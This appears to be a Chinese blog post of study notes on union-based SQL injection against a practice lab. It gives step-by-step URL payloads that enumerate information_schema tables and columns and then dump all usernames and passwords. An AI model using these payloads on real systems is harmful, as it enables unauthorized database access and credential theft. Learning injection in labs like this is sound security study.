sql注入 Four day

已于 2024-08-11 12:38:50 修改
阅读量275 收藏 10
点赞数 5
文章标签: 数据库 oracle
于 2024-08-11 12:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55121503/article/details/141097787
版权

union注入

1.了解union注入过程中用到的关键数据库、数据表、数据列

2.sql查询中group_concat的作用

最终目标

使用union注入拿到靶机中数据库里的所有用户名和密码

        查询语句   select列名 + from表名 + where限定语句

拿到表名和列名

         数据库

information_schema                                     

包含所有mysql数据库的简要信息吗,其中包含有两个所需数据表

tables 表名集合表

columns 列名集合表

1.所需要表名信息在数据库information_schema—>数据表tables—>数据列table_name

?id=0' union select 1,table_name,3 from information_schema.tables --+

2.过滤在security数据库中的表名,即table_schema为security的行

?id=0' union select 1,table_name,3 from information_schema.tables where table_schema='security'--+

group_concat()的作用

确保所有查询信息能放到一行显示出来

?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

查找数据库security中数据表users的列名

所需要信息在数据库information_schema数据表columns数据列column_name

?id=0' union select 1,table_name,3 from information_schema.columns--+

过滤在security数据库中数据表user的列名

?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

查询最终目标

查询语句 select列名+from表名 +where限定语句

?id=0' union select 1,group_concat(username,'~',password),3 from users --+

插入"~"区分数据

〃KIяItò°
关注
学习sql注入:猜测数据库_面向数据科学家SQL:学习简单方法
weixin_26746401的博客
08-21 230
学习sql注入:猜测数据库We don’t pick a hammer and look for nails — that would be an unusual way of solving problems. The usual way of doing business is to identify the problem first, then look for appropriate t...
Redis基础(超详解)一 :Redis定义、SQL与NoSQL区别、Redis常用命令、Redis五种数据类型、String、List、Set、Hash、ZSet;Redis的Java客户端
qq_44700578的博客
07-03 611
Redis定义、SQL与NoSQL区别、Redis常用命令、Redis五种数据类型、String、List、Set、Hash、ZSet,及对应常用命令;Redis的Java客户端
渗透学习笔记
莫黎小天
11-06 2417
一、SQL注入漏洞 SQL注入:web程序对用户输入数据的合法性没有判断,前端传入后端的参数可控的,并且参数带入数据库查询,攻击者可通过构造SQL语句来实现对数据库的任意操作。 1.sql注入原理 满足条件: ​ 参数用户可控:前端传入后端的内容用户可以控制 ​ 参数带入数据库查询:传入的参数拼接到SQL语句,且带入数据库查询。 原因:用户输入的数据被SQL解释器执行 2.注入漏洞分类 1)数字型注入 当输入的参数为整型时,如:ID、年龄、页码,若存在注入漏洞,则可认为是数字型 测试:
Day12_Spring事务
weixin_45014721的博客
09-24 595
在使用@Transactional注解声明事务时,有时我们想自定义回滚的异常,spring也是支持的。可以通过设置rollbackFor参数,来完成这个功能。@Slf4j@Service如果在执行上面这段代码,保存和更新数据时,程序报错了,抛了SqlException、DuplicateKeyException等异常。而BusinessException是我们自定义的异常,报错的异常不属于BusinessException,所以事务也不会回滚。
Spring_four
一杯咖啡
03-31 192
1、Spring JdbcTemlate基本使用 ①导入spring-jdbc和spring-tx 【前者封装着Jdbc的模板对象,后者是事务控制的对象】 ②创建数据库和实体类 ③创建JdbcTemlate对象 ④执行数据操作 导入spring-jdbc和spring-tx <!--c3p0数据库驱动包--> <dependency> ...
MySQL---four JDBC
weixin_65440201的博客
07-23 194
JDBC规范定义接口,具体的实现由各大数据库厂商来实现。JDBC是Java访问数据库的标准规范,真正怎么操作数据库还需要具体的实现类,也就是数据库驱动。每个数据库厂商根据自家数据库的通信格式编写好自己数据库的驱动。所以我们只需要会调用JDBC接口中的方法即可,数据库驱动由数据库厂商提供。程序员如果要开发访问数据库的程序,只需要会调用JDBC接口中的方法即可,不用关注类是如何实现的。使用同一套Java代码,进行少量的修改就可以访问其他JDBC支持的数据库说明提交事务。...
oracle注入大全
Y1ch0的专栏
12-01 1679
Detecting SQL Injection in Oracle by Pete Finnigan last updated July 22, 2003 --------------------------------------------------------------------------------IntroductionLast year I wrote a two-part
大数据分析师题库整理(Part Four)
qq_43671197的博客
10-15 2339
Day16 691 Rowkey设计的原则,下列哪些选项的描述是正确的? 尽量保证越短越好 可以使用汉字 可以使用字符串 692 HBase构建二级索引的实现方式有哪些? MapReduce Coprocessor 693关于HBase二级索引的描述,哪些是正确的? 核心是倒排表 二级索引概念是对应Rowkey这个“―级”索引 694下列关于BloomFilter的描述正确的是? 是一个很长的二进制向量和一系列随机映射函数 有一定的误算率 695 HBase官方版本可以安装在..
Sql Server中Waitfor delay 语句的使用
hp_oracle的专栏
06-02 2295
/* > */CREATE PROCEDURE [dbo].PP_Cleanup @daystoleave INT, @chunksize INT, @reportsize INT, @proc VARCHAR(30)/*  There are four input parameters:                                            *//*    1)
PHP+Mysql 带SQL注入源码 下载
01-01
SQL注入是一种常见的网络攻击方式,攻击者通过输入恶意的SQL代码来操纵或破坏数据库。当应用程序没有正确地过滤用户输入并将其直接拼接到SQL查询中时,就可能发生SQL注入。例如,一个不安全的登录表单可能会允许攻击...
SQL注入的一个ASP网站源码
12-29
在提供的标题和描述中,我们关注的是"SQL注入"这一安全问题。SQL注入是网络安全领域中的一个重要话题,它允许攻击者通过输入恶意的SQL语句来操纵数据库,获取敏感信息,甚至完全控制网站。 SQL注入通常发生在网站的...
〖Python 数据库开发实战 - Python与MySQL交互篇②〗- SQL 注入攻击案例
热门推荐
易编橙 · 终身成长社群,相遇已是上上签!
08-22 4万+
上一章节,我们只是简单的了解了 MySQL Connector 的语法,完成了一个简单的案例。Python 语言操作数据库不是到这里就结束了后续还有很多高级的内容等着我们去学习,该章节我们就来学习一下对所有数据库都有效的 "SQL 注入攻击" 。
计算机毕业设计之:基于微信小程序的诗词智能学习系统(源码+文档+解答)
程序员阿龙的博客
09-22 4367
博主介绍: ✌我是阿龙,一名专注于Java技术领域的程序员,全网拥有10W+粉丝。作为CSDN特邀作者、博客专家、新星计划导师,我在计算机毕业设计开发方面积累了丰富的经验。同时,我也是掘金、华为云、阿里云、InfoQ等平台的优质作者。通过长期分享和实战指导,我致力于帮助更多学生完成毕业项目和技术提升。 技术范围: 我熟悉的技术领域涵盖SpringBoot、Vue、SSM、HLMT、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、小程序、安卓app、大数据、物联网、机器学习等方
Online DDL (Data Definition Language)
09-23 246
是MySQL中的一个功能,允许在修改表结构(如添加、删除或修改列)的同时,允许对表进行并发读写操作。在传统的DDL操作中,对表结构的修改会导致整个表被锁定,从而阻止其他事务对该表进行读写操作,这可能导致长时间的锁定和性能问题。Online DDL的引入解决了这个问题,它允许在修改表结构的同时,保持对表的并发访问。MySQL从5.6版本开始引入了Online DDL的部分功能,而在8.0版本中对Online DDL进行了进一步的优化。
Java Alibaba Druid 数据库连接池
miracle的专栏
09-24 699
在Java开发中,数据库连接池是性能优化的重要一环。而作为一款强大的数据库连接池解决方案,凭借其和对多种数据库的支持,成为了许多企业级应用的首选。本篇文章将介绍Druid的核心特性,并结合不同数据库的实际用法。
MySQL数据库的增删改查以及基本操作分享
m0_57094953的博客
09-21 454
MySQL数据库基本操作分享,包括增删改查,登录退出,查看数据库、表等
JPA+Thymeleaf增删改查
最新发布
y050505的博客
09-25 414
在使用JPA(Java Persistence API)和Thymeleaf作为模板引擎进行Web开发时,实现增删改查(CRUD)操作是一个常见的需求。下面,我将简要介绍如何使用Spring Boot框架结合JPA和Thymeleaf来实现这一功能。
No operations allowed after statement closed
abments的博客
09-20 709
错误信息:参考解决方案 https://github.com/alibaba/druid/issues/5549如果修改socket-timeout不生效,可以尝试修改 socketTimeout。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值